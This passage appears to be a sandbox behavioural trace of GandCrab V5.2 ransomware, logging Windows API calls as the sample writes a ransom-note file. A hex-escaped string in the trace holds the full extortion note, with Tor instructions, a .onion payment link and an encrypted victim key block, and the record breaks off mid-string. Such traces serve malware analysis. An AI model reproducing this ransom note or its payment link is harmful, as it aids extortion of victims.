lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\" [0070.348] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.349] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.349] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.349] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.349] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.349] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.349] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.350] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\\\TITWMVJL-DECRYPT.txt") returned 107 [0070.350] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\dqqhjz8c\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0070.351] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77